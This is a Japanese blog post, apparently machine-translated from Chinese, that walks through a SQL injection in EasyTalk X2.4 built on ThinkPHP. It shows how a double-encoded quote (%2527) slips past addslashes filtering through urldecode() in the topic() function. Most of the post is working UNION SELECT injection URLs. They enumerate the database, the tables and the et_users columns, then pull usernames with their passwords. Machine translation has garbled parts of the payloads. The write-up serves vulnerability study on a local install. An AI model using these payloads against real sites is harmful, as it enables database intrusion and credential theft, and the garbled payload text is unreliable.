現在の WEB プログラムには、基本的に SQL インジェクション用のグローバル フィルタリングが備わっています。たとえば、PHP は GPC をオンにするか、グローバル ファイル common.php の addslashes() 関数を使用して、受信したパラメータ、特に一重引用符をフィルタリングします。 。この状況に遭遇した場合、グローバル保護をバイパスするためのエンコードおよびデコード関数を見つける必要があります。この記事では、urldecode() の状況について説明します。同様に、専門家は迂回してください~
この脆弱性は暗雲から来ています: http:/ /www.wooyun.org/bugs/wooyun-2014-050338
背景を見ると、easytalk プログラムの低バージョン、バージョン X2.4 を使用しました
①ソースコード: http:// pan.baidu.com/s/1bopOFNL② www の easytalk ディレクトリに解凍し、プロンプトに従って段階的にインストールします。問題が発生した場合は、Baidu または Google で検索してください。成功したら、次の図にアクセスしてください:
0x03 脆弱性分析
興味がある場合は、学習してください。初心者は、ThinkPHP が受信したパラメーターをフィルター処理し、GPC を有効にするサーバーが対応する処理を実行するかどうかに依存することを知ることができます:
1. /ThinkPHP/Extend/Library/ORG/Util/Input.class の 266 行目。 php ファイル:
/** +---------------------------------------------------------- * 如果 magic_quotes_gpc 为关闭状态,这个函数可以转义字符串 +---------------------------------------------------------- * @access public +---------------------------------------------------------- * @param string $string 要处理的字符串 +---------------------------------------------------------- * @return string +---------------------------------------------------------- */static public function addSlashes($string) { if (!get_magic_quotes_gpc()) { $string = addslashes($string); } return $string;}2. Seay コード監査システムのグローバル検索機能を使用して、キーワード「urldecode」を持つファイルについて、TopicAction.class.php に受信したパラメーターを urldecode する場所が含まれていることがわかりました。キーワードと SQL クエリ:
3. この php ファイルを追跡したところ、urldecode トランスコーディングを実行し、すぐにそれをクエリに取り込み、インジェクションを引き起こしたことがわかりました:
public function topic() { $keyword=$this->_get('keyword','urldecode');//使用ThinkPHP框架自带的_get对接收的keyword参数进行urldecode(详见http://doc.thinkphp.cn/manual/get_system_var.html) if ($keyword) { $topic = D('Topic')->where("topicname='$keyword'")->find();//ok,带入查询了 if ($topic) { $isfollow=D('Mytopic')->isfollow($topic['id'],$this->my['user_id']); $topicusers=D('MytopicView')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select(); //getwidget $widget=M('Topicwidget')->where("topicid='$topic[id]'")->order('`order` ASC')->select(); if ($widget) { foreach ($widget as $val) { $topicwidget[$val['widgettype']][]=$val; } } $this->assign('topicwidget',$topicwidget); } else { $count=$isfollow=0; } $this->assign('comefrom','topic'); $this->assign('keyword',$keyword); $this->assign('topic',$topic); $this->assign('topicusers',$topicusers); $this->assign('isfollow',$isfollow); $this->assign('subname','#'.$keyword.'#'); $this->display(); } else { header("location:".SITE_URL.'/?m=topic&a=index'); }}0x04 脆弱性証明
http://localhost/eazytalk/?m=topic&a=topic&keyword= aaa%2527 および 1=2 Union select 1,2,3,concat(database) (),0x5c,user(),0x5c,version()),5 %23
正常に取得された情報は次のとおりです:
View MySql ログをダウンロードし、SQL ステートメントが正常に実行されたことを確認します:
2. データベース easytalk のすべてのテーブルを取得する POC を構築します:
http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 および 1= 2 Union select 1,2,3, ( select GROUP_CONCAT(DISTINCT table_name) from information_schema.tables where table_schema=0x6561737974616C6B),5%23
以下のようにすべてのテーブル情報を取得します:
4. テーブル et_users のすべてのフィールドを取得するように構築します。情報 POC:
http: //localhost/easytalk/?m=topic&a=topic&keyword=aaa%2527 および 1=2 Union select 1,2,3, (select GROUP_CONCAT(DISTINCT column_name) from information_schema.columns where table_name= 0x65745F7573657273),5%23
次のように et_users テーブルのすべてのフィールド情報が正常に取得されました:
5. et_users テーブルの最初のアカウントを取得するための POC を構築します:
http://localhost/eazytalk/?m=topic&a=topic&keyword =aaa% 2527 および 1=2 Union select 1,2,3, (select GROUP_CONCAT(DISTINCT user_name,0x5f,password) from et_users limit 0,1),5%23
次のようにテーブル admin のアカウント パスワードを正常に取得しました:
元のアドレス:
http://www.cnbraid.com/2015/12/24/sql1/